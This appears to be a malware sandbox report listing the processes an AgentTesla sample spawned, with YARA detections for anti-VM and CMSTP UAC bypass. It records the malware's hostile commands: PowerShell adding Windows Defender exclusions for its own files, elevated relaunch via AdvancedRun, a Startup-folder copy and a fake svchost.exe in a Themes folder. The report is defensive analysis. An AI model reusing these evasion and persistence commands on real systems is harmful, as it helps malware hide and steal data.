                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.434117466.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.434117466.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.505699283.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.505699283.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.373601058.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.373601058.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.432432130.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.432432130.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.374239562.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.374239562.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.374484408.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.374484408.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Start time:15:20:34
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:15:20:34
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:15:20:38
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:91000 bytes
                                                                                                                  MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 3%, Metadefender, Browse
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:moderate

                                                                                                                  General

                                                                                                                  Start time:15:20:41
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:91000 bytes
                                                                                                                  MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  General

                                                                                                                  Start time:15:20:44
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:15:20:45
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:15:20:45
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:46
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:47
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:47
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:47
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:48
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:48
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:48
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:49
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:49
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:50
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:50
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:51
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
                                                                                                                  Imagebase:0xa50000
                                                                                                                  File size:780216 bytes
                                                                                                                  MD5 hash:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 44%, ReversingLabs

                                                                                                                  General

                                                                                                                  Start time:15:20:51
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:56
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:58
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:57
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:59
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:59
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:59
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
                                                                                                                  Imagebase:0x210000
                                                                                                                  File size:780216 bytes
                                                                                                                  MD5 hash:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:21:02
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

General

Start time: 15:21:10
Start date: 15/09/2021
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase: 0xb50000
File size: 55400 bytes
MD5 hash: 17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 15:21:10
Start date: 15/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 15:21:11
Start date: 15/09/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
Imagebase: 0xf60000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 15:21:13
Start date: 15/09/2021
Path: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe'
Imagebase: 0xb0000
File size: 780216 bytes
MD5 hash: 0CECFA83EE6EA6DD1DE38462BBEDF15C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 44%, ReversingLabs

General

Start time: 15:21:21
Start date: 15/09/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328
Imagebase: 0xf60000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 15:21:23
Start date: 15/09/2021
Path: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe'
Imagebase: 0x4d0000
File size: 780216 bytes
MD5 hash: 0CECFA83EE6EA6DD1DE38462BBEDF15C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000028.00000002.583823180.0000000003FA1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.583823180.0000000003FA1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000028.00000002.588230224.0000000007380000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.588230224.0000000007380000.00000004.00020000.sdmp, Author: Joe Security

Disassembly

Code Analysis
